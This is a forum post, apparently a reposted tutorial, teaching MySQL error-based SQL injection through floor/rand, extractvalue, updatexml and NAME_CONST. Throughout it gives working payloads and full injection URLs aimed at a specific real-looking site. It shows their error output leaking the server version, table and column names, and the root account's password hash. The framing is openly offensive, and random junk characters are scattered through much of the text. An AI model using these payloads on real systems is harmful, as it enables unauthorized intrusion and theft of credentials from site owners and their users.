|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:8 b9 Q, x) N7 D; }# G# q0 x
首先进行正常查询: mysql> select * from article where id = 1;( b4 Q7 u1 E) b8 n
+—-+——-+———+2 ~* [6 x8 T& I
| id | title | content |/ Z) X6 z" B7 S" x
+—-+——-+———+: _ `2 S/ f. w5 M. M
| 1 | test | do it | H, z3 f, W2 s
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
1 ^* C0 ]2 g8 R5 Y% UERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。& j9 Y# y, v0 q" e% J; P
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);* v7 W1 f3 ?' n0 a5 ^' q e. j
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
7 t0 k* G0 \ I5 s4 P/ w, o. nERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
! e. h% Q2 h" F% h' ` {3 }* o测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
. |- N9 \6 k7 a' {" ~, fERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ % _% @! P1 ^* z w3 i9 `
1 `7 D; E3 q3 C4 Z% R再收集:
' _6 N$ T& \" C! M# N' @. Zhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
; J0 @) y% `4 X' u
# E( Q7 Y2 }8 y! {Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’0 l7 S3 _4 ^" X/ K; |8 U; P% v
9 | w1 Q* p+ x8 @" K" {0 T
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)2 x3 |' u* Q1 v1 e# l5 |
3 @0 h% Z$ h& _, h4 G
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 2 W0 `! b* D5 ?( n/ u* W, B9 R) H
; { `1 ]- M* L% I
MYSQL高版本报错注入技巧-利用NAME_CONST注入" M6 c& f/ i0 k/ \
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 2 c, u' s2 l, j
: p& n5 ^ y7 x' F, s* F6 U
+ F. ~( R9 z. |+ c1 z相关信息
: o. _0 j @) C) L! o
% P2 t! K2 T' ONAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.: e H! X7 K; V3 U! C
0 I+ U+ B9 j$ a( [4 |* k" S
Code:
# a! {. u3 [7 y9 j7 ^. @" |/ jNAME_CONST(DATA, VALUE)7 S# R) E2 W" z4 t7 u
* R2 Z7 B* |9 B4 Y6 Z5 D
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.7 _: m% n7 c( D* i6 d
2 ]. \" _ [9 ^% A( X3 s$ \- O# K
SELECT NAME_CONST('TEST', 1)2 K+ h' G+ N3 `9 [- r& D
0 @+ r. T1 j6 U, p$ H
& X5 c+ A) `' m: }. X L
5 U4 [$ u7 L8 q, m, E5 n
|---------------|+ _1 b9 n3 C; x8 R7 M
| TEST |! g* `; z) Q3 v: y! F* f
| |1 d$ g8 I8 ^8 @# q) Q
|---------------|
5 o, l0 f) T6 w! ]| 1 |
2 K2 x9 X. O9 O/ F& b% }| |" d, e2 A1 D& C, `5 Q
|---------------|3 V5 Y1 r2 x5 S) Q6 p0 r
- _ J% W1 t1 _) D' ?9 J
! q8 l @+ |9 p$ i- x% O7 F
& Z: _+ |' }4 _/ O# i3 w" P) g5 f. s) j& M$ }
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
* _ }. _* I" J; R- x- g& A3 LIntro to MySQL Variables6 B+ g9 L& o" v1 R6 s9 A6 u. o
- Y3 |* u- c9 GOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
) J3 P, R0 {5 @; P( R P2 M7 s! |+ p& f; p! }- a( t9 T4 i
Code:' \# Y& Z* Y6 j ?" A
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261# \8 |: Q2 A8 o3 k
% O; L( U% `! a9 M* y
. q# ^+ ]4 k5 ]5 o8 { J+ ?0 H5 ]; ]. |) T1 C3 }, W
( I) K0 [' P, g, _$ }
, g7 B9 b2 n+ w2 o# l8 Q6 _0 LCode:# b; _- a c5 B- M1 O) e) h& b
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--9 X, g" S" V" N& K* x( t# h N
' m, t! G6 {& R& E, z# v
1 B+ L* @7 x! `1 MVAR = Your MySQL variable.: G, T2 H" ]1 L6 O4 z# u9 z
9 _; [5 y7 u' K4 a- Q
MySQL 5.1.3 Server System Variables7 F. o( j! ^% J% U
( a% V% K$ d+ r4 c& kLet's try it out on my site..
+ X" D' q9 G" i, m$ e9 D2 l) v! Z
3 C, u2 |( [1 w) |! i0 U. l, p$ \& {Code:
3 q$ t' f$ m% i: ^7 ?- c6 }http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
8 T6 P3 z' b4 A( P+ r" j3 ]# G' S+ C: _6 F: U T
Erroruplicate column name '5.0.27-community-nt'6 n+ |4 t' D* {' o. | F! K
& k% O9 j" w) s! P6 ?, l( X, o7 o5 \7 A3 n( _, @
) Q- W T% t$ P
8 Q2 w0 [$ x6 S5 p5 U+ d( \- E0 b0 Z5 f9 V, ^" K0 {( `
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...+ ^8 m6 c! V! y# d A
- T# K( q6 ~/ {! M3 A" O. s
Data Extraction) D7 F9 R! ~; b* F# Y
4 C7 r A6 y" U5 l/ ~( q' \4 N4 GCode:
9 F9 f6 \, _+ q6 }+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
2 V9 l. G# K! [" V& n" p
1 I3 i. L# c& ?% r7 J
0 x4 N$ c" D+ N2 U9 f7 ? RWe should get a duplicate column 1 error...
+ ?( x: r: j- x% i2 l
+ T- I! o# D3 n4 I3 zCode:# b8 l# x+ P( o
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--. d6 \& D4 ~0 k- ^3 y
$ o$ f. B) v0 N3 J2 [$ v
Erroruplicate column name '10 O' z* q, u; |. v0 F5 h2 o5 u
7 e$ d9 V) j5 a+ ^% p; q7 A1 O; L: s
4 F% N& p8 p) r. Y, \9 {) |& W! I1 ]- f8 }
' a% S9 f; K7 O. M% n8 ?8 o7 g9 n$ X( d& I
Now let's get the tables out this bitch..# `# T9 G ^- q+ w9 a/ A
1 M$ H& J/ a# M, f$ kCode:1 A: X" f& \' { r3 A5 u! R
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
& z, ^" w. A5 j0 M; D4 K1 b: m5 u/ P3 ^) i# @3 N
7 h3 G. s0 K0 V
Let's see if it works here, if it does, we can go on and finish the job.
, |4 W4 Z8 r! i q1 v% f u! a2 h$ D2 x3 G& J6 J$ K
Code:$ l3 T% ?7 E1 q+ a. t
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
5 \) G% f/ z. v% I$ K0 X+ J' \6 {- x
5 R* `% ?/ G( \7 `4 y+ h7 s9 L3 a& x- Q. d! S" ~- v- m4 O
Erroruplicate column name 'com_admanage( G. W6 B4 c1 I* |+ q7 ^8 ?* y9 Y9 u
6 D3 t% [8 H1 I8 F; o
# s1 [# g1 A/ o% ~
/ N9 F2 P* T& \' ]$ ~, E4 i6 r2 u& U, c# A- C
3 N4 Q% X. w, {. l. ^# T4 w* w
, J% s; N7 ^+ fNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
4 j. Q, S9 S+ K% L- x% X# @% [7 M% A! M7 \3 U
Let's get the columns out of the user table..
4 F" O; I; Y0 I0 ~. ^
' p) _, ~/ |1 U% X) {- `3 rCode:" ^7 }0 m9 [ G: }
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--6 @+ k% B" u4 w# q6 E% h
# {* i. M/ \4 ]5 K6 F. u j% B4 F& t2 ]2 l. l
So mine looks like this, and I get the duplicate column name 'Host'.
) I q& E5 @+ m @/ A0 P
, q% `' ?2 T1 e/ MCode:" I. g) F8 ~4 Y5 P# Z$ [: p
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
& ], a" D ]/ B+ V/ N. X: J& w8 N
Erroruplicate column name 'Host'
; d1 ]2 C, q% ?6 p
" D/ j" \2 s, U% P# Z. |$ s: g7 h
) P4 f& L1 d$ @' B7 y j- c8 F! n" f( V( }" M
+ L# [% D$ S% {1 [1 J1 q
0 n* C- s& S: z: M3 n8 e: `" p0 H( o3 x( S% m5 I
Woot, time to finish this bitch off.
5 P' X$ [' K* J
. V h# i& T4 M; h! ~+ X0 DCode:) K9 M; A( z, x! y" T" }
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
6 L! O3 Q |5 O& B f
8 y( J% {5 I; a( x
, `1 s5 @ p- y# N! d/ xSo mine looks like this...
# L% d6 L( i9 }6 \
7 @2 _0 V6 m1 \. y+ m/ HCode:& @) C! H6 d$ ^" v t( m8 Y: D" c
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--2 S+ @0 z7 t) F" N M
* v, q$ d6 V8 o1 ?0 R6 i# p2 D
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'8 f% j8 g1 j# r& d* _, U
" D# L6 ~$ R- E+ h- Q" @. [: s
. }( G3 h. n: A
1 q# ]; L% \ ~6 ]( g6 e3 b3 d9 n( l& b6 @4 j5 e% B- F/ r' C
# ~: F w$ O) v+ v: C
j8 ]: ^0 u: @1 \5 L, |2 c6 |4 n& E
And there we have it, thanks for reading.
7 u/ x3 |2 w, Q" d' j% E) c+ h) ]4 e3 N) c; D
|
发表于 2015-11-11 19:03:37
收藏
支持
反对